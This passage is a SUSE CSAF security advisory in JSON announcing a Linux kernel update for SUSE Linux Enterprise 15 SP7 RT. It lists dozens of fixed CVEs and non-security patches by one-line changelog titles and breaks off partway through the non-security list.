| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 15 SP7 RT kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \u0027UBSAN: shift-out-of-bounds error\u0027 (bsc#1256760).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).\n- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).\n- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- ALSA: usb: Increase volume range that triggers a warning (git-fixes).\n- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).\n- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).\n- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).\n- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).\n- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).\n- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).\n- ASoC: tlv320adcx140: fix null pointer (git-fixes).\n- ASoC: tlv320adcx140: fix word length (git-fixes).\n- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).\n- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).\n- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).\n- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).\n- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).\n- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).\n- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).\n- NFSD: Fix permission check for read access to executable-only files (git-fixes).\n- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).\n- NFSv4: ensure the open stateid seqid doesn\u0027t go backwards (git-fixes).\n- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).\n- RDMA/mana_ib: Add device statistics support (git-fixes).\n- RDMA/mana_ib: Add port statistics support (git-fixes).\n- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).\n- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).\n- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).\n- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).\n- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).\n- RDMA/mana_ib: Extend modify QP (git-fixes).\n- RDMA/mana_ib: Fix error code in probe() (git-fixes).\n- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).\n- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).\n- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).\n- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).\n- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).\n- RDMA/mana_ib: UD/GSI work requests (git-fixes).\n- RDMA/mana_ib: Use safer allocation function() (git-fixes).\n- RDMA/mana_ib: add additional port counters (git-fixes).\n- RDMA/mana_ib: add support of multiple ports (git-fixes).\n- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).\n- RDMA/mana_ib: create kernel-level CQs (git-fixes).\n- RDMA/mana_ib: create/destroy AH (git-fixes).\n- RDMA/mana_ib: extend mana QP table (git-fixes).\n- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).\n- RDMA/mana_ib: implement get_dma_mr (git-fixes).\n- RDMA/mana_ib: implement req_notify_cq (git-fixes).\n- RDMA/mana_ib: indicate CM support (git-fixes).\n- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).\n- RDMA/mana_ib: request error CQEs when supported (git-fixes).\n- RDMA/mana_ib: support of the zero based MRs (git-fixes).\n- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).\n- Revert \u0027nfc/nci: Add the inconsistency check between the input data length and count\u0027 (git-fixes).\n- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).\n- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).\n- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).\n- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- bs-upload-kernel: Fix cve branch uploads.\n- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).\n- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).\n- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).\n- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).\n- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: add new field to track the last access time of cfid (git-fixes).\n- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).\n- cifs: avoid redundant calls to disable multichannel (git-fixes).\n- cifs: cifs_pick_channel should try selecting active channels (git-fixes).\n- cifs: deal with the channel loading lag while picking channels (git-fixes).\n- cifs: dns resolution is needed only for primary channel (git-fixes).\n- cifs: do not disable interface polling on failure (git-fixes).\n- cifs: do not search for channel if server is terminating (git-fixes).\n- cifs: fix a pending undercount of srv_count (git-fixes).\n- cifs: fix lock ordering while disabling multichannel (git-fixes).\n- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).\n- cifs: fix use after free for iface while disabling secondary channels (git-fixes).\n- cifs: handle servers that still advertise multichannel after disabling (git-fixes).\n- cifs: handle when server starts supporting multichannel (git-fixes).\n- cifs: handle when server stops supporting multichannel (git-fixes).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).\n- cifs: make sure that channel scaling is done only once (git-fixes).\n- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).\n- cifs: reset connections for all channels when reconnect requested (git-fixes).\n- cifs: reset iface weights when we cannot find a candidate (git-fixes).\n- cifs: serialize other channels when query server interfaces is pending (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).\n- comedi: dmm32at: serialize use of paged registers (git-fixes).\n- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).\n- cpuset: fix warning when disabling remote partition (bsc#1256794).\n- crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (git-fixes).\n- dmaengine: apple-admac: Add \u0027apple,t8103-admac\u0027 compatible (git-fixes).\n- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).\n- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).\n- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).\n- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).\n- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).\n- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).\n- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).\n- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).\n- dmaengine: tegra-adma: Fix use-after-free (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).\n- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).\n- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).\n- dmaengine: xilinx_dma: Fix uninitialized addr_width when \u0027xlnx,addrwidth\u0027 property is missing (git-fixes).\n- dpll: Prevent duplicate registrations (git-fixes).\n- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).\n- dpll: fix return value check for kmemdup (git-fixes).\n- dpll: indent DPLL option type by a tab (git-fixes).\n- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).\n- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).\n- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).\n- drm/amd/display: Fix DP no audio issue (stable-fixes).\n- drm/amd/display: Initialise backlight level values from hw (git-fixes).\n- drm/amd/display: Respect user\u0027s CONFIG_FRAME_WARN more for dml files (stable-fixes).\n- drm/amd/display: shrink struct members (stable-fixes).\n- drm/amd/pm: Don\u0027t clear SI SMC table when setting power limit (git-fixes).\n- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).\n- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).\n- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).\n- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).\n- drm/amdgpu: Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).\n- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).\n- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).\n- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).\n- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).\n- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/imx/tve: fix probe device leak (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).\n- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).\n- drm/nouveau: add missing DCB connector types (git-fixes).\n- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).\n- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).\n- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).\n- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).\n- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).\n- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).\n- exfat: fix remount failure in different process environments (git-fixes).\n- gpio: omap: do not register driver in probe() (git-fixes).\n- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).\n- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).\n- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).\n- gpio: pca953x: fix wrong error probe return value (git-fixes).\n- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).\n- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- iio: accel: iis328dq: fix gain values (git-fixes).\n- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).\n- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).\n- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).\n- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).\n- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).\n- intel_th: fix device leak on output open() (git-fixes).\n- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).\n- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).\n- mISDN: annotate data-race around dev-\u003ework (git-fixes).\n- mei: me: add nova lake point S DID (stable-fixes).\n- mei: me: add wildcat lake P DID (stable-fixes).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087 bsc#1254447).\n- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).\n- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).\n- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: mana: Add metadata support for xdp mode (git-fixes).\n- net: mana: Add standard counter rx_missed_errors (git-fixes).\n- net: mana: Add support for auxiliary device servicing events (git-fixes).\n- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).\n- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).\n- net: mana: Fix use-after-free in reset service rescan path (git-fixes).\n- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).\n- net: mana: Handle Reset Request from MANA NIC (git-fixes).\n- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).\n- net: mana: Handle hardware recovery events when probing the device (git-fixes).\n- net: mana: Handle unsupported HWC commands (git-fixes).\n- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).\n- net: mana: Probe rdma device in mana driver (git-fixes).\n- net: mana: Reduce waiting time if HWC not responding (git-fixes).\n- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: dm9601: remove broken SR9700 support (git-fixes).\n- net: wwan: t7xx: fix potential skb-\u003efrags overflow in RX path (git-fixes).\n- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).\n- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).\n- nfsd: Drop the client reference in client_states_open() (git-fixes).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- nvmet-auth: update sc_c in host response (git-fixes).\n- nvmet-auth: update sc_c in target host hash calculation (git-fixes).\n- 